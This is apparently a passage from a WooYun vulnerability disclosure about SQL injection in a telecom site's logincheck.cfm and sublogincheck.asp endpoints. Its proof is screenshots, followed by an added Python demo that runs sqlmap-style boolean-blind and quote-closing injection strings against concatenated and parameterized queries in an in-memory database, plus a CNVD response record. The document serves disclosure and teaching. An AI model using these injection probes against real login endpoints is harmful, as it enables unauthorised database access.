[screenshot: 4.jpg]


[screenshot: 5.jpg]

Proof of vulnerability:

[screenshot: 2.jpg]


[screenshot: 3.jpg]


[screenshot: 6.jpg]


Fix:

You know what to do.
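The report leaves the fix implicit. As an added example, not code from the site, the Python script below models the two query shapes the report exercises, the numeric id= parameter of logincheck.cfm and the quoted ConfName/ConfPwd parameters of sublogincheck.asp, once with the request value spliced into the SQL text and once typed and bound, and runs sqlmap's simplest boolean-blind and quote probes against each. SQLite in memory stands in for the Oracle back end so it runs offline, and the table and column names are assumed for the demo. The ColdFusion equivalent of the bound shape is cfqueryparam with an explicit cfsqltype; in classic ASP it is an ADODB.Command with Parameters instead of a concatenated string.

```python
import sqlite3

# Added example (not code from the vulnerable site): a model of the two lookup
# shapes this report exercises. The real back end is Oracle behind
# ColdFusion/ASP; SQLite in memory stands in so the example runs offline.
# Table and column names are assumptions for the demo.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE terminal (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE conference (conf_name TEXT, conf_pwd TEXT)")
    conn.execute("INSERT INTO terminal VALUES (18315, 'demo-terminal')")   # constructed row
    conn.execute("INSERT INTO conference VALUES ('admin', 'not-111111')")  # constructed row
    return conn


# --- the vulnerable shape: request values spliced into the SQL text ---------

def terminal_exists_concat(conn, id_value):
    sql = "SELECT COUNT(*) FROM terminal WHERE id = " + id_value
    return conn.execute(sql).fetchone()[0]


def conf_login_concat(conn, conf_name, conf_pwd):
    sql = ("SELECT COUNT(*) FROM conference WHERE conf_name = '" + conf_name
           + "' AND conf_pwd = '" + conf_pwd + "'")
    return conn.execute(sql).fetchone()[0]


# --- the fixed shape: type the input, then bind it -------------------------

def terminal_exists_param(conn, id_value):
    try:
        id_int = int(id_value)   # cf_sql_integer-style typing: anything that is not a number is rejected
    except ValueError:
        return None              # no SQL runs at all for a malformed id
    sql = "SELECT COUNT(*) FROM terminal WHERE id = ?"
    return conn.execute(sql, (id_int,)).fetchone()[0]


def conf_login_param(conn, conf_name, conf_pwd):
    sql = "SELECT COUNT(*) FROM conference WHERE conf_name = ? AND conf_pwd = ?"
    return conn.execute(sql, (conf_name, conf_pwd)).fetchone()[0]


# --- sqlmap-style checks run against both shapes ---------------------------

def boolean_blind_differs(lookup, conn):
    """sqlmap's boolean-based blind test in its simplest form: the same request
    with a true and with a false predicate appended to the valid id. If the
    database evaluates the predicate, the two responses differ."""
    true_resp = lookup(conn, "18315 AND 1=1")
    false_resp = lookup(conn, "18315 AND 1=2")
    return true_resp != false_resp


def quote_probe(login, conn):
    """Heuristic quote test. A lone quote breaks the statement when it is
    concatenated (the error channel the error-based technique then exploits);
    sqlmap's own payloads close the quote again with AND 'knXb'='knXb so the
    statement stays valid while the injected predicate runs."""
    results = {}
    for label, pwd in (("bare_quote", "111111'"),
                       ("closed_quote", "111111' AND 'knXb'='knXb")):
        try:
            results[label] = login(conn, "admin", pwd)
        except sqlite3.OperationalError:
            results[label] = "syntax error"
    return results


if __name__ == "__main__":
    db = make_db()
    print("concat id lookup, blind differential:", boolean_blind_differs(terminal_exists_concat, db))
    print("bound  id lookup, blind differential:", boolean_blind_differs(terminal_exists_param, db))
    print("concat login:", quote_probe(conf_login_concat, db))
    print("bound  login:", quote_probe(conf_login_param, db))
```

The true/false differential on the concatenated id lookup is what the "boolean-based blind" finding earlier on this page means; on the typed and bound version both probes are refused before any SQL runs, and a stray quote in the password is just another character in the bound value, so neither the error channel nor the predicate reaches the database.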

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-10-16 09:05

Vendor reply:

CNVD confirmed the reported issue and has forwarded it via CNCERT to China Unicom Group, which will coordinate handling with the unit that manages the site.

Latest status:

None yet